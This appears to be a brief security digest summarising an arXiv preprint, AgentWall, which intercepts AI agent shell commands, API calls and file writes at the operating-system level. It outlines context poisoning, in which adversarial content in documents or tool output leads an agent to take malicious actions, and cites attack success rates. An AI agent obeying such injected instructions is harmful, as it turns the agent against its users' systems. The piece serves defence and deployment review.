arXiv AgentWall Preprint (2605.16265) — OS-Level Runtime Interception for AI Agents

AI relevance: A new arXiv preprint proposes moving the AI agent safety boundary from model alignment to OS-level interception, blocking malicious shell commands, API calls, and file writes before they execute on the host system.

Preprint. Not peer-reviewed.

  • Paper arXiv:2605.16265 introduces AgentWall, a runtime safety architecture that intercepts agent actions at the operating-system level before execution — filtering shell commands, API calls, and file modifications.
  • The design targets context poisoning: when adversarial content in the agent's context window (a poisoned document, compromised API response, manipulated tool output) causes the model to take malicious actions that its own safety training doesn't catch.
  • The architectural question is live: most agentic AI safety work focuses on model alignment (what the model decides), while AgentWall moves the enforcement point to where actions actually execute on the host (what the model's decisions do).
  • Context poisoning is a documented attack surface for local agents with tool access — DeepMind's hidden-instruction research demonstrated reproducible injection success, and the Agent Security Bench benchmark reports >84% average attack success across 27 attack/defense combinations.
  • At time of writing, no public GitHub repository is associated with the paper; the design's tractability remains unproven.
  • The paper arrives alongside active regulatory attention: CISA's agentic AI guidance and the NIST AI Risk Management Framework both treat agent action surfaces as priority concern areas.

Why it matters

Model-level alignment has a known gap: an adversary who can inject malicious instructions into retrieved data can cause the model to act on them without triggering its own safety filters. OS-level interception doesn't try to out-reason the attacker — it enforces a hard boundary between the agent's decision and the system primitives it controls. Even if the AgentWall design itself is unproven, the question it raises is architectural: at what layer does your deployment enforce action constraints?

What to do

  • Map where your local agent deployment currently enforces action constraints — if the honest answer is "the model handles it," the threat model has a gap.
  • Review actual tool permissions (filesystem, network, API scopes) against the principle of least privilege for any production agent with shell or file access.
  • Watch for independent replication attempts and follow-on guidance from CISA/NIST referencing OS-level interception approaches.

Sources